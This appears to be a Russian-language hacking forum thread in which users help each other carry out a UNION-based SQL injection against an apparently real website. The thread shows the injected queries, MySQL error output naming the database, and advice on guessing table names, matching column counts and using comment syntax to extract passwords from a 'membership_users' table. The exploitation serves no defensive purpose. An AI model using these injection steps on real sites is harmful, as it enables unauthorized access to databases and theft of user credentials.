|
И снова sql иньекция
Нашол вот такую афигительную sql иньекцию:
Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,null from admin] ( 1146 : Table 'igor987_studio.admin' doesn't exist ) |
видишь префикс membership_ ? ну попробуй с ним че нить намутить. таблица admin - на самом деле маловероятно... попробуй просто user,users (с префиксом).
|
admin_users встречал
|
Блин нашол вот такая фигня вылазит
Код:
[SELECT failed in SQL: SELECT COUNT(*) FROM membership_categories WHERE parentid=2 union select null,null,password from membership_users AND enabled=1] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND enabled=1' at line 1 )[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,password from membership_users*/] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '*/' at line 1 ) |
бля нахуя тебе тут что-то эранировать тем более неправильно?
1)у тебя кол-во столбцов из второго слеекта должно быть равно кол-ву столбцов из первого, то есть один 2)твои коментарии должны выглядить так Код:
/*КАМЕНТЫ*/Код:
/*КАМЕНТЫ |
Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns ) |
Цитата:
|
| Время: 02:26 |